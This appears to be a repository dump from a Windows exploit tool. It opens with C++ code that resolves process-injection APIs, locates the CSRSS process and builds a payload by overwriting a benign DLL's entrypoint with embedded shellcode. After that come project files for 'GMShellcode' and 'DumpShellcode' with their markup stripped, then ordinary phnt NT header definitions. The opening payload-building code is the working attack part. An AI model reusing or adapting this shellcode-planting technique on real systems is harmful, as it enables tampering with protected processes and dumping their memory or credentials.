28 | memcpy(pParams->magicNops, nops, sizeof(nops)); 29 | 30 | wcsncpy(pParams->mutexName, BNO MUTEX_NAME_BASE, _countof(pParams->mutexName)); 31 | wcsncpy(pParams->reqName, BNO REQ_NAME_BASE, _countof(pParams->reqName)); 32 | wcsncpy(pParams->doneName, BNO DONE_NAME_BASE, _countof(pParams->doneName)); 33 | wcsncpy(pParams->sectionName, BNO SECTION_NAME_BASE, _countof(pParams->sectionName)); 34 | 35 | // IAT 36 | if (!hNtdll || !hWin32U) 37 | { 38 | Log(Error, "Couldn't find kernel32/win32u? What?"); 39 | return false; 40 | } 41 | 42 | pCsrGetProcessId = (CsrGetProcessId_t)GetProcAddress(hNtdll, "CsrGetProcessId"); 43 | if (!pCsrGetProcessId) 44 | { 45 | Log(Error, "Failed to resolve CsrGetProcessId"); 46 | return false; 47 | } 48 | pParams->dwCsrssPid = pCsrGetProcessId(); 49 | //pParams->pThreadObject = FindKTHREAD(dwThreadId); 50 | 51 | Log(Info, "CSRSS PID is %u", pParams->dwCsrssPid); 52 | //Log(Info, "Elevate TID is %u. KTHREAD is at %p", dwThreadId, pParams->pThreadObject); 53 | 54 | #define REQUIRE_IMPORT(p) if (!(p)) { goto IMPORT_FAILURE; } 55 | 56 | // Target process should already have ntdll and win32u loaded, so we can just pass pointers over 57 | 58 | // ntdll 59 | REQUIRE_IMPORT(pParams->pNtOpenProcess = (NtOpenProcess_t)GetProcAddress(hNtdll, "NtOpenProcess")); 60 | REQUIRE_IMPORT(pParams->pNtTerminateProcess = (NtTerminateProcess_t)GetProcAddress(hNtdll, "NtTerminateProcess")); 61 | REQUIRE_IMPORT(pParams->pRtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege")); 62 | REQUIRE_IMPORT(pParams->pNtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory")); 63 | REQUIRE_IMPORT(pParams->pNtWriteVirtualMemory = (NtWriteVirtualMemory_t)GetProcAddress(hNtdll, "NtWriteVirtualMemory")); 64 | REQUIRE_IMPORT(pParams->pRtlCreateUserThread = (RtlCreateUserThread_t)GetProcAddress(hNtdll, "RtlCreateUserThread")); 65 | REQUIRE_IMPORT(pParams->pNtWaitForSingleObject = 
(NtWaitForSingleObject_t)GetProcAddress(hNtdll, "NtWaitForSingleObject")); 66 | REQUIRE_IMPORT(pParams->pNtCreateMutant = (NtCreateMutant_t)GetProcAddress(hNtdll, "NtCreateMutant")); 67 | REQUIRE_IMPORT(pParams->pNtCreateEvent = (NtCreateEvent_t)GetProcAddress(hNtdll, "NtCreateEvent")); 68 | REQUIRE_IMPORT(pParams->pNtSetEvent = (NtSetEvent_t)GetProcAddress(hNtdll, "NtSetEvent")); 69 | REQUIRE_IMPORT(pParams->pNtCreateSection = (NtCreateSection_t)GetProcAddress(hNtdll, "NtCreateSection")); 70 | REQUIRE_IMPORT(pParams->pNtMapViewOfSection = (NtMapViewOfSection_t)GetProcAddress(hNtdll, "NtMapViewOfSection")); 71 | 72 | // win32u 73 | REQUIRE_IMPORT(pParams->pNtUserHardErrorControl = (NtUserHardErrorControl_t)GetProcAddress(hWin32U, "NtUserHardErrorControl")); 74 | REQUIRE_IMPORT(pParams->pNtUserSetInformationThread = (NtUserSetInformationThread_t)GetProcAddress(hWin32U, "NtUserSetInformationThread")); 75 | 76 | return true; 77 | 78 | IMPORT_FAILURE: 79 | Log(Error, "Failed to resolve a payload import"); 80 | return false; 81 | } 82 | 83 | // Find DLL entrypoint and overwrite it with shellcode 84 | bool BuildPayload( 85 | HANDLE hBenignDll, 86 | std::string & payloadBuffer) 87 | { 88 | std::string buf; 89 | LARGE_INTEGER dllSize = { 0, }; 90 | DWORD dwBytesRead = 0; 91 | PCHAR pEntrypoint = NULL; 92 | DWORD bytesWritten = 0; 93 | SHELLCODE_PARAMS params = { 0, }; 94 | SIZE_T availableSpace = 0; 95 | const uint8_t magic[] = MAGIC_NOPS; 96 | DWORD curOffset = 0; 97 | 98 | // Read entire source file into buffer 99 | SetFilePointer(hBenignDll, 0, NULL, SEEK_SET); 100 | GetFileSizeEx(hBenignDll, &dllSize); 101 | buf.resize(dllSize.QuadPart); 102 | 103 | if (!ReadFile(hBenignDll, &buf[0], dllSize.LowPart, &dwBytesRead, NULL) || 104 | (dwBytesRead != dllSize.QuadPart)) 105 | { 106 | Log(Error, "BuildPayload: ReadFile failed with GLE %u", GetLastError()); 107 | return false; 108 | } 109 | 110 | pEntrypoint = (PCHAR)FindEntrypointVA(buf); 111 | if (!pEntrypoint) 112 | { 113 | 
return false; 114 | } 115 | 116 | availableSpace = &buf[buf.size()] - (char*)pEntrypoint; 117 | 118 | // Write magic NOPs 119 | memcpy(pEntrypoint, magic, sizeof(magic)); 120 | curOffset += sizeof(magic); 121 | 122 | // Overwrite entrypoint with shellcode embedded in our resource section 123 | if (!WriteShellcode(MAKEINTRESOURCE(RES_PAYLOAD), pEntrypoint + curOffset, availableSpace, bytesWritten)) 124 | { 125 | return false; 126 | } 127 | curOffset += bytesWritten; 128 | 129 | // Create a SHELLCODE_PARAMS and write it after the shellcode 130 | if (!InitShellcodeParams(¶ms)) 131 | { 132 | return false; 133 | } 134 | 135 | if (pEntrypoint + curOffset + sizeof(params) > buf.data() + buf.size() - 1) 136 | { 137 | Log(Error, "Not enough space for SHELLCODE_PARAMS"); 138 | return false; 139 | } 140 | 141 | params.mySize = curOffset + sizeof(params); 142 | 143 | memcpy((pEntrypoint) + curOffset, ¶ms, sizeof(params)); 144 | 145 | payloadBuffer = std::move(buf); 146 | 147 | return true; 148 | } 149 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {4ac42f11-3b8d-49fc-bd5f-341e42488630} 17 | PayloadShellcode 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | 27 | 28 | Application 29 | false 30 | v142 31 | true 32 | Unicode 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | false 48 | 49 | 50 | 51 | 52 | false 53 | 54 | 55 | 56 | 57 | 58 | Level3 59 | false 60 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 61 | true 62 | false 63 | false 64 | Default 65 | false 66 | true 67 | false 68 | $(SolutionDir)/phnt/include 69 | ProgramDatabase 70 | 71 | 72 | Console 73 | true 74 | false 75 | false 76 | Default 77 | FunctionOrder.txt 78 | GMShellcode.def 79 | 80 | 81 | 82 | 83 | 84 | 
85 | $(TargetPath) 86 | 87 | 88 | 89 | 90 | Level3 91 | true 92 | false 93 | false 94 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | Disabled 97 | false 98 | false 99 | false 100 | false 101 | $(SolutionDir)/phnt/include 102 | 103 | 104 | Console 105 | false 106 | false 107 | true 108 | Default 109 | FunctionOrder.txt 110 | GMShellcode.def 111 | 112 | 113 | 114 | 115 | 116 | 117 | $(TargetPath) 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {48dbc3f5-99e0-4904-b83e-58419768f52e} 17 | DumpShellcode 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | 27 | 28 | Application 29 | false 30 | v142 31 | true 32 | Unicode 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | false 48 | 49 | 50 | 51 | 52 | false 53 | 54 | 55 | 56 | 57 | 58 | Level3 59 | false 60 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 61 | true 62 | false 63 | false 64 | Default 65 | false 66 | true 67 | false 68 | ProgramDatabase 69 | $(SolutionDir)/phnt/include 70 | 71 | 72 | Console 73 | true 74 | false 75 | false 76 | Default 77 | FunctionOrder.txt 78 | DumpShellcode.def 79 | 80 | 81 | 82 | 83 | 84 | 85 | $(TargetPath) 86 | 87 | 88 | 89 | 90 | Level3 91 | true 92 | false 93 | false 94 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | Disabled 97 | false 98 | false 99 | false 100 | false 101 | $(SolutionDir)/phnt/include 102 | 103 | 104 | Console 105 | false 106 | false 107 | true 108 | Default 109 | FunctionOrder.txt 110 | DumpShellcode.def 111 | 112 | 113 | 114 | 115 | 116 | 117 | $(TargetPath) 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 
-------------------------------------------------------------------------------- /phnt/include/ntdbg.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Debugger support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTDBG_H 8 | #define _NTDBG_H 9 | 10 | // Debugging 11 | 12 | NTSYSAPI 13 | VOID 14 | NTAPI 15 | DbgUserBreakPoint( 16 | VOID 17 | ); 18 | 19 | NTSYSAPI 20 | VOID 21 | NTAPI 22 | DbgBreakPoint( 23 | VOID 24 | ); 25 | 26 | NTSYSAPI 27 | VOID 28 | NTAPI 29 | DbgBreakPointWithStatus( 30 | _In_ ULONG Status 31 | ); 32 | 33 | #define DBG_STATUS_CONTROL_C 1 34 | #define DBG_STATUS_SYSRQ 2 35 | #define DBG_STATUS_BUGCHECK_FIRST 3 36 | #define DBG_STATUS_BUGCHECK_SECOND 4 37 | #define DBG_STATUS_FATAL 5 38 | #define DBG_STATUS_DEBUG_CONTROL 6 39 | #define DBG_STATUS_WORKER 7 40 | 41 | NTSYSAPI 42 | ULONG 43 | STDAPIVCALLTYPE 44 | DbgPrint( 45 | _In_z_ _Printf_format_string_ PCSTR Format, 46 | ... 47 | ); 48 | 49 | NTSYSAPI 50 | ULONG 51 | STDAPIVCALLTYPE 52 | DbgPrintEx( 53 | _In_ ULONG ComponentId, 54 | _In_ ULONG Level, 55 | _In_z_ _Printf_format_string_ PCSTR Format, 56 | ... 
57 | ); 58 | 59 | NTSYSAPI 60 | ULONG 61 | NTAPI 62 | vDbgPrintEx( 63 | _In_ ULONG ComponentId, 64 | _In_ ULONG Level, 65 | _In_z_ PCCH Format, 66 | _In_ va_list arglist 67 | ); 68 | 69 | NTSYSAPI 70 | ULONG 71 | NTAPI 72 | vDbgPrintExWithPrefix( 73 | _In_z_ PCCH Prefix, 74 | _In_ ULONG ComponentId, 75 | _In_ ULONG Level, 76 | _In_z_ PCCH Format, 77 | _In_ va_list arglist 78 | ); 79 | 80 | NTSYSAPI 81 | NTSTATUS 82 | NTAPI 83 | DbgQueryDebugFilterState( 84 | _In_ ULONG ComponentId, 85 | _In_ ULONG Level 86 | ); 87 | 88 | NTSYSAPI 89 | NTSTATUS 90 | NTAPI 91 | DbgSetDebugFilterState( 92 | _In_ ULONG ComponentId, 93 | _In_ ULONG Level, 94 | _In_ BOOLEAN State 95 | ); 96 | 97 | NTSYSAPI 98 | ULONG 99 | NTAPI 100 | DbgPrompt( 101 | _In_ PCCH Prompt, 102 | _Out_writes_bytes_(Length) PCH Response, 103 | _In_ ULONG Length 104 | ); 105 | 106 | // Definitions 107 | 108 | typedef struct _DBGKM_EXCEPTION 109 | { 110 | EXCEPTION_RECORD ExceptionRecord; 111 | ULONG FirstChance; 112 | } DBGKM_EXCEPTION, *PDBGKM_EXCEPTION; 113 | 114 | typedef struct _DBGKM_CREATE_THREAD 115 | { 116 | ULONG SubSystemKey; 117 | PVOID StartAddress; 118 | } DBGKM_CREATE_THREAD, *PDBGKM_CREATE_THREAD; 119 | 120 | typedef struct _DBGKM_CREATE_PROCESS 121 | { 122 | ULONG SubSystemKey; 123 | HANDLE FileHandle; 124 | PVOID BaseOfImage; 125 | ULONG DebugInfoFileOffset; 126 | ULONG DebugInfoSize; 127 | DBGKM_CREATE_THREAD InitialThread; 128 | } DBGKM_CREATE_PROCESS, *PDBGKM_CREATE_PROCESS; 129 | 130 | typedef struct _DBGKM_EXIT_THREAD 131 | { 132 | NTSTATUS ExitStatus; 133 | } DBGKM_EXIT_THREAD, *PDBGKM_EXIT_THREAD; 134 | 135 | typedef struct _DBGKM_EXIT_PROCESS 136 | { 137 | NTSTATUS ExitStatus; 138 | } DBGKM_EXIT_PROCESS, *PDBGKM_EXIT_PROCESS; 139 | 140 | typedef struct _DBGKM_LOAD_DLL 141 | { 142 | HANDLE FileHandle; 143 | PVOID BaseOfDll; 144 | ULONG DebugInfoFileOffset; 145 | ULONG DebugInfoSize; 146 | PVOID NamePointer; 147 | } DBGKM_LOAD_DLL, *PDBGKM_LOAD_DLL; 148 | 149 | typedef struct 
_DBGKM_UNLOAD_DLL 150 | { 151 | PVOID BaseAddress; 152 | } DBGKM_UNLOAD_DLL, *PDBGKM_UNLOAD_DLL; 153 | 154 | typedef enum _DBG_STATE 155 | { 156 | DbgIdle, 157 | DbgReplyPending, 158 | DbgCreateThreadStateChange, 159 | DbgCreateProcessStateChange, 160 | DbgExitThreadStateChange, 161 | DbgExitProcessStateChange, 162 | DbgExceptionStateChange, 163 | DbgBreakpointStateChange, 164 | DbgSingleStepStateChange, 165 | DbgLoadDllStateChange, 166 | DbgUnloadDllStateChange 167 | } DBG_STATE, *PDBG_STATE; 168 | 169 | typedef struct _DBGUI_CREATE_THREAD 170 | { 171 | HANDLE HandleToThread; 172 | DBGKM_CREATE_THREAD NewThread; 173 | } DBGUI_CREATE_THREAD, *PDBGUI_CREATE_THREAD; 174 | 175 | typedef struct _DBGUI_CREATE_PROCESS 176 | { 177 | HANDLE HandleToProcess; 178 | HANDLE HandleToThread; 179 | DBGKM_CREATE_PROCESS NewProcess; 180 | } DBGUI_CREATE_PROCESS, *PDBGUI_CREATE_PROCESS; 181 | 182 | typedef struct _DBGUI_WAIT_STATE_CHANGE 183 | { 184 | DBG_STATE NewState; 185 | CLIENT_ID AppClientId; 186 | union 187 | { 188 | DBGKM_EXCEPTION Exception; 189 | DBGUI_CREATE_THREAD CreateThread; 190 | DBGUI_CREATE_PROCESS CreateProcessInfo; 191 | DBGKM_EXIT_THREAD ExitThread; 192 | DBGKM_EXIT_PROCESS ExitProcess; 193 | DBGKM_LOAD_DLL LoadDll; 194 | DBGKM_UNLOAD_DLL UnloadDll; 195 | } StateInfo; 196 | } DBGUI_WAIT_STATE_CHANGE, *PDBGUI_WAIT_STATE_CHANGE; 197 | 198 | #define DEBUG_READ_EVENT 0x0001 199 | #define DEBUG_PROCESS_ASSIGN 0x0002 200 | #define DEBUG_SET_INFORMATION 0x0004 201 | #define DEBUG_QUERY_INFORMATION 0x0008 202 | #define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | \ 203 | DEBUG_READ_EVENT | DEBUG_PROCESS_ASSIGN | DEBUG_SET_INFORMATION | \ 204 | DEBUG_QUERY_INFORMATION) 205 | 206 | #define DEBUG_KILL_ON_CLOSE 0x1 207 | 208 | typedef enum _DEBUGOBJECTINFOCLASS 209 | { 210 | DebugObjectUnusedInformation, 211 | DebugObjectKillProcessOnExitInformation, // s: ULONG 212 | MaxDebugObjectInfoClass 213 | } DEBUGOBJECTINFOCLASS, *PDEBUGOBJECTINFOCLASS; 214 | 215 | // 
System calls 216 | 217 | NTSYSCALLAPI 218 | NTSTATUS 219 | NTAPI 220 | NtCreateDebugObject( 221 | _Out_ PHANDLE DebugObjectHandle, 222 | _In_ ACCESS_MASK DesiredAccess, 223 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 224 | _In_ ULONG Flags 225 | ); 226 | 227 | NTSYSCALLAPI 228 | NTSTATUS 229 | NTAPI 230 | NtDebugActiveProcess( 231 | _In_ HANDLE ProcessHandle, 232 | _In_ HANDLE DebugObjectHandle 233 | ); 234 | 235 | NTSYSCALLAPI 236 | NTSTATUS 237 | NTAPI 238 | NtDebugContinue( 239 | _In_ HANDLE DebugObjectHandle, 240 | _In_ PCLIENT_ID ClientId, 241 | _In_ NTSTATUS ContinueStatus 242 | ); 243 | 244 | NTSYSCALLAPI 245 | NTSTATUS 246 | NTAPI 247 | NtRemoveProcessDebug( 248 | _In_ HANDLE ProcessHandle, 249 | _In_ HANDLE DebugObjectHandle 250 | ); 251 | 252 | NTSYSCALLAPI 253 | NTSTATUS 254 | NTAPI 255 | NtSetInformationDebugObject( 256 | _In_ HANDLE DebugObjectHandle, 257 | _In_ DEBUGOBJECTINFOCLASS DebugObjectInformationClass, 258 | _In_ PVOID DebugInformation, 259 | _In_ ULONG DebugInformationLength, 260 | _Out_opt_ PULONG ReturnLength 261 | ); 262 | 263 | NTSYSCALLAPI 264 | NTSTATUS 265 | NTAPI 266 | NtWaitForDebugEvent( 267 | _In_ HANDLE DebugObjectHandle, 268 | _In_ BOOLEAN Alertable, 269 | _In_opt_ PLARGE_INTEGER Timeout, 270 | _Out_ PDBGUI_WAIT_STATE_CHANGE WaitStateChange 271 | ); 272 | 273 | // Debugging UI 274 | 275 | NTSYSAPI 276 | NTSTATUS 277 | NTAPI 278 | DbgUiConnectToDbg( 279 | VOID 280 | ); 281 | 282 | NTSYSAPI 283 | HANDLE 284 | NTAPI 285 | DbgUiGetThreadDebugObject( 286 | VOID 287 | ); 288 | 289 | NTSYSAPI 290 | VOID 291 | NTAPI 292 | DbgUiSetThreadDebugObject( 293 | _In_ HANDLE DebugObject 294 | ); 295 | 296 | NTSYSAPI 297 | NTSTATUS 298 | NTAPI 299 | DbgUiWaitStateChange( 300 | _Out_ PDBGUI_WAIT_STATE_CHANGE StateChange, 301 | _In_opt_ PLARGE_INTEGER Timeout 302 | ); 303 | 304 | NTSYSAPI 305 | NTSTATUS 306 | NTAPI 307 | DbgUiContinue( 308 | _In_ PCLIENT_ID AppClientId, 309 | _In_ NTSTATUS ContinueStatus 310 | ); 311 | 312 | NTSYSAPI 313 | 
NTSTATUS 314 | NTAPI 315 | DbgUiStopDebugging( 316 | _In_ HANDLE Process 317 | ); 318 | 319 | NTSYSAPI 320 | NTSTATUS 321 | NTAPI 322 | DbgUiDebugActiveProcess( 323 | _In_ HANDLE Process 324 | ); 325 | 326 | NTSYSAPI 327 | VOID 328 | NTAPI 329 | DbgUiRemoteBreakin( 330 | _In_ PVOID Context 331 | ); 332 | 333 | NTSYSAPI 334 | NTSTATUS 335 | NTAPI 336 | DbgUiIssueRemoteBreakin( 337 | _In_ HANDLE Process 338 | ); 339 | 340 | NTSYSAPI 341 | NTSTATUS 342 | NTAPI 343 | DbgUiConvertStateChangeStructure( 344 | _In_ PDBGUI_WAIT_STATE_CHANGE StateChange, 345 | _Out_ LPDEBUG_EVENT DebugEvent 346 | ); 347 | 348 | NTSYSAPI 349 | NTSTATUS 350 | NTAPI 351 | DbgUiConvertStateChangeStructureEx( 352 | _In_ PDBGUI_WAIT_STATE_CHANGE StateChange, 353 | _Out_ LPDEBUG_EVENT DebugEvent 354 | ); 355 | 356 | struct _EVENT_FILTER_DESCRIPTOR; 357 | 358 | typedef VOID (NTAPI *PENABLECALLBACK)( 359 | _In_ LPCGUID SourceId, 360 | _In_ ULONG IsEnabled, 361 | _In_ UCHAR Level, 362 | _In_ ULONGLONG MatchAnyKeyword, 363 | _In_ ULONGLONG MatchAllKeyword, 364 | _In_opt_ struct _EVENT_FILTER_DESCRIPTOR *FilterData, 365 | _Inout_opt_ PVOID CallbackContext 366 | ); 367 | 368 | typedef ULONGLONG REGHANDLE, *PREGHANDLE; 369 | 370 | NTSYSAPI 371 | NTSTATUS 372 | NTAPI 373 | EtwEventRegister( 374 | _In_ LPCGUID ProviderId, 375 | _In_opt_ PENABLECALLBACK EnableCallback, 376 | _In_opt_ PVOID CallbackContext, 377 | _Out_ PREGHANDLE RegHandle 378 | ); 379 | 380 | #endif 381 | -------------------------------------------------------------------------------- /phnt/include/phnt_ntdef.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Native definition support 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _PHNT_NTDEF_H 8 | #define _PHNT_NTDEF_H 9 | 10 | #ifndef _NTDEF_ 11 | #define _NTDEF_ 12 | 13 | // This header file provides basic NT types not included in Win32. 
If you have included winnt.h 14 | // (perhaps indirectly), you must use this file instead of ntdef.h. 15 | 16 | #ifndef NOTHING 17 | #define NOTHING 18 | #endif 19 | 20 | // Basic types 21 | 22 | typedef struct _QUAD 23 | { 24 | union 25 | { 26 | __int64 UseThisFieldToCopy; 27 | double DoNotUseThisField; 28 | }; 29 | } QUAD, *PQUAD; 30 | 31 | // This isn't in NT, but it's useful. 32 | typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _QUAD_PTR 33 | { 34 | ULONG_PTR DoNotUseThisField1; 35 | ULONG_PTR DoNotUseThisField2; 36 | } QUAD_PTR, *PQUAD_PTR; 37 | 38 | typedef ULONG LOGICAL; 39 | typedef ULONG *PLOGICAL; 40 | 41 | typedef _Return_type_success_(return >= 0) LONG NTSTATUS; 42 | typedef NTSTATUS *PNTSTATUS; 43 | 44 | // Cardinal types 45 | 46 | typedef char CCHAR; 47 | typedef short CSHORT; 48 | typedef ULONG CLONG; 49 | 50 | typedef CCHAR *PCCHAR; 51 | typedef CSHORT *PCSHORT; 52 | typedef CLONG *PCLONG; 53 | 54 | typedef PCSTR PCSZ; 55 | 56 | // Specific 57 | 58 | typedef UCHAR KIRQL, *PKIRQL; 59 | typedef LONG KPRIORITY, *PKPRIORITY; 60 | typedef USHORT RTL_ATOM, *PRTL_ATOM; 61 | 62 | typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; 63 | 64 | typedef struct _LARGE_INTEGER_128 65 | { 66 | LONGLONG QuadPart[2]; 67 | } LARGE_INTEGER_128, *PLARGE_INTEGER_128; 68 | 69 | // NT status macros 70 | 71 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 72 | #define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1) 73 | #define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2) 74 | #define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3) 75 | 76 | #define NT_FACILITY_MASK 0xfff 77 | #define NT_FACILITY_SHIFT 16 78 | #define NT_FACILITY(Status) ((((ULONG)(Status)) >> NT_FACILITY_SHIFT) & NT_FACILITY_MASK) 79 | 80 | #define NT_NTWIN32(Status) (NT_FACILITY(Status) == FACILITY_NTWIN32) 81 | #define WIN32_FROM_NTSTATUS(Status) (((ULONG)(Status)) & 0xffff) 82 | 83 | // Functions 84 | 85 | #ifndef _WIN64 86 | #define FASTCALL __fastcall 87 | 
#else 88 | #define FASTCALL 89 | #endif 90 | 91 | // Synchronization enumerations 92 | 93 | typedef enum _EVENT_TYPE 94 | { 95 | NotificationEvent, 96 | SynchronizationEvent 97 | } EVENT_TYPE; 98 | 99 | typedef enum _TIMER_TYPE 100 | { 101 | NotificationTimer, 102 | SynchronizationTimer 103 | } TIMER_TYPE; 104 | 105 | typedef enum _WAIT_TYPE 106 | { 107 | WaitAll, 108 | WaitAny, 109 | WaitNotification 110 | } WAIT_TYPE; 111 | 112 | // Strings 113 | 114 | typedef struct _STRING 115 | { 116 | USHORT Length; 117 | USHORT MaximumLength; 118 | _Field_size_bytes_part_opt_(MaximumLength, Length) PCHAR Buffer; 119 | } STRING, *PSTRING, ANSI_STRING, *PANSI_STRING, OEM_STRING, *POEM_STRING; 120 | 121 | typedef STRING UTF8_STRING; 122 | typedef PSTRING PUTF8_STRING; 123 | 124 | typedef const STRING *PCSTRING; 125 | typedef const ANSI_STRING *PCANSI_STRING; 126 | typedef const OEM_STRING *PCOEM_STRING; 127 | 128 | typedef struct _UNICODE_STRING 129 | { 130 | USHORT Length; 131 | USHORT MaximumLength; 132 | _Field_size_bytes_part_(MaximumLength, Length) PWCH Buffer; 133 | } UNICODE_STRING, *PUNICODE_STRING; 134 | 135 | typedef const UNICODE_STRING *PCUNICODE_STRING; 136 | 137 | #define RTL_CONSTANT_STRING(s) { sizeof(s) - sizeof((s)[0]), sizeof(s), s } 138 | 139 | // Balanced tree node 140 | 141 | #define RTL_BALANCED_NODE_RESERVED_PARENT_MASK 3 142 | 143 | typedef struct _RTL_BALANCED_NODE 144 | { 145 | union 146 | { 147 | struct _RTL_BALANCED_NODE *Children[2]; 148 | struct 149 | { 150 | struct _RTL_BALANCED_NODE *Left; 151 | struct _RTL_BALANCED_NODE *Right; 152 | }; 153 | }; 154 | union 155 | { 156 | UCHAR Red : 1; 157 | UCHAR Balance : 2; 158 | ULONG_PTR ParentValue; 159 | }; 160 | } RTL_BALANCED_NODE, *PRTL_BALANCED_NODE; 161 | 162 | #define RTL_BALANCED_NODE_GET_PARENT_POINTER(Node) \ 163 | ((PRTL_BALANCED_NODE)((Node)->ParentValue & ~RTL_BALANCED_NODE_RESERVED_PARENT_MASK)) 164 | 165 | // Portability 166 | 167 | typedef struct _SINGLE_LIST_ENTRY32 168 | { 169 | ULONG 
Next; 170 | } SINGLE_LIST_ENTRY32, *PSINGLE_LIST_ENTRY32; 171 | 172 | typedef struct _STRING32 173 | { 174 | USHORT Length; 175 | USHORT MaximumLength; 176 | ULONG Buffer; 177 | } STRING32, *PSTRING32; 178 | 179 | typedef STRING32 UNICODE_STRING32, *PUNICODE_STRING32; 180 | typedef STRING32 ANSI_STRING32, *PANSI_STRING32; 181 | 182 | typedef struct _STRING64 183 | { 184 | USHORT Length; 185 | USHORT MaximumLength; 186 | ULONGLONG Buffer; 187 | } STRING64, *PSTRING64; 188 | 189 | typedef STRING64 UNICODE_STRING64, *PUNICODE_STRING64; 190 | typedef STRING64 ANSI_STRING64, *PANSI_STRING64; 191 | 192 | // Object attributes 193 | 194 | #define OBJ_PROTECT_CLOSE 0x00000001 195 | #define OBJ_INHERIT 0x00000002 196 | #define OBJ_AUDIT_OBJECT_CLOSE 0x00000004 197 | #define OBJ_PERMANENT 0x00000010 198 | #define OBJ_EXCLUSIVE 0x00000020 199 | #define OBJ_CASE_INSENSITIVE 0x00000040 200 | #define OBJ_OPENIF 0x00000080 201 | #define OBJ_OPENLINK 0x00000100 202 | #define OBJ_KERNEL_HANDLE 0x00000200 203 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400 204 | #define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800 205 | #define OBJ_DONT_REPARSE 0x00001000 206 | #define OBJ_VALID_ATTRIBUTES 0x00001ff2 207 | 208 | typedef struct _OBJECT_ATTRIBUTES 209 | { 210 | ULONG Length; 211 | HANDLE RootDirectory; 212 | PUNICODE_STRING ObjectName; 213 | ULONG Attributes; 214 | PVOID SecurityDescriptor; // PSECURITY_DESCRIPTOR; 215 | PVOID SecurityQualityOfService; // PSECURITY_QUALITY_OF_SERVICE 216 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 217 | 218 | typedef const OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES; 219 | 220 | #define InitializeObjectAttributes(p, n, a, r, s) { \ 221 | (p)->Length = sizeof(OBJECT_ATTRIBUTES); \ 222 | (p)->RootDirectory = r; \ 223 | (p)->Attributes = a; \ 224 | (p)->ObjectName = n; \ 225 | (p)->SecurityDescriptor = s; \ 226 | (p)->SecurityQualityOfService = NULL; \ 227 | } 228 | 229 | #define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) { sizeof(OBJECT_ATTRIBUTES), NULL, n, a, NULL, 
NULL } 230 | #define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) 231 | 232 | #define OBJ_NAME_PATH_SEPARATOR ((WCHAR)L'\\') 233 | #define OBJ_NAME_ALTPATH_SEPARATOR ((WCHAR)L'/') 234 | 235 | // Portability 236 | 237 | typedef struct _OBJECT_ATTRIBUTES64 238 | { 239 | ULONG Length; 240 | ULONG64 RootDirectory; 241 | ULONG64 ObjectName; 242 | ULONG Attributes; 243 | ULONG64 SecurityDescriptor; 244 | ULONG64 SecurityQualityOfService; 245 | } OBJECT_ATTRIBUTES64, *POBJECT_ATTRIBUTES64; 246 | 247 | typedef const OBJECT_ATTRIBUTES64 *PCOBJECT_ATTRIBUTES64; 248 | 249 | typedef struct _OBJECT_ATTRIBUTES32 250 | { 251 | ULONG Length; 252 | ULONG RootDirectory; 253 | ULONG ObjectName; 254 | ULONG Attributes; 255 | ULONG SecurityDescriptor; 256 | ULONG SecurityQualityOfService; 257 | } OBJECT_ATTRIBUTES32, *POBJECT_ATTRIBUTES32; 258 | 259 | typedef const OBJECT_ATTRIBUTES32 *PCOBJECT_ATTRIBUTES32; 260 | 261 | // Product types 262 | 263 | typedef enum _NT_PRODUCT_TYPE 264 | { 265 | NtProductWinNt = 1, 266 | NtProductLanManNt, 267 | NtProductServer 268 | } NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE; 269 | 270 | typedef enum _SUITE_TYPE 271 | { 272 | SmallBusiness, 273 | Enterprise, 274 | BackOffice, 275 | CommunicationServer, 276 | TerminalServer, 277 | SmallBusinessRestricted, 278 | EmbeddedNT, 279 | DataCenter, 280 | SingleUserTS, 281 | Personal, 282 | Blade, 283 | EmbeddedRestricted, 284 | SecurityAppliance, 285 | StorageServer, 286 | 